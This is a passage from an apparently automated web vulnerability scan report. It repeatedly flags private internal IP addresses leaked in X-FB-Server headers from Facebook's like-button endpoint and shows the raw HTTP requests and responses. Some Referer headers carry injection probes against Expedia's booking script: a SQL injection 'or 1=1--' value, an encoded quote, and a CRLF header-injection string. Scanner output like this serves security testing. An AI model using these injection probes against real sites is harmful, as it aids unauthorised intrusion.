User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.193.36
X-Cnection: close
Date: Sat, 07 May 2011 11:25:03 GMT
Content-Length: 9934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.91. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.90.123
X-Cnection: close
Date: Sat, 07 May 2011 02:45:26 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.92. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ee84d5c%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ffacebook.com%2Fexpedia&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=340 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.54.47
X-Cnection: close
Date: Fri, 06 May 2011 22:33:45 GMT
Content-Length: 9931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.93. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=1061613067%20or%201%3d1--%20&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.23.29
X-Cnection: close
Date: Sat, 07 May 2011 02:25:59 GMT
Content-Length: 6903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.94. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.172.111
X-Cnection: close
Date: Sat, 07 May 2011 02:55:27 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.95. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.128.31
X-Cnection: close
Date: Fri, 06 May 2011 22:41:34 GMT
Content-Length: 7101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.96. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.192.106
X-Cnection: close
Date: Sat, 07 May 2011 02:55:25 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.97. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.178.111
X-Cnection: close
Date: Sat, 07 May 2011 02:55:15 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.98. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.233.109
X-Cnection: close
Date: Sat, 07 May 2011 02:55:22 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.99. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.65.103
X-Cnection: close
Date: Sat, 07 May 2011 02:45:45 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.100. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=1&rged=%2527&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.186.104
X-Cnection: close
Date: Sat, 07 May 2011 02:53:53 GMT
Content-Length: 6886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.101. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.221.77
X-Cnection: close
Date: Fri, 06 May 2011 22:41:26 GMT
Content-Length: 6937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.102. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.63.111
X-Cnection: close
Date: Sat, 07 May 2011 02:44:45 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.103. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.189.127
X-Cnection: close
Date: Sat, 07 May 2011 02:50:28 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.104. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/answers/list/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.79.118
X-Cnection: close
Date: Sat, 07 May 2011 02:48:53 GMT
Content-Length: 6771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.105. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df310e73f44%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff7077cb88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ffacebook.com%2Fexpedia&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=340 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.50.47
X-Cnection: close
Date: Fri, 06 May 2011 22:35:21 GMT
Content-Length: 9934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.106. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.40.104
X-Cnection: close
Date: Sat, 07 May 2011 02:31:25 GMT
Content-Length: 7097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.107. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.212.103
X-Cnection: close
Date: Sat, 07 May 2011 02:44:32 GMT
Content-Length: 7095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.108. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.1.63
X-Cnection: close
Date: Sat, 07 May 2011 02:27:34 GMT
Content-Length: 6878

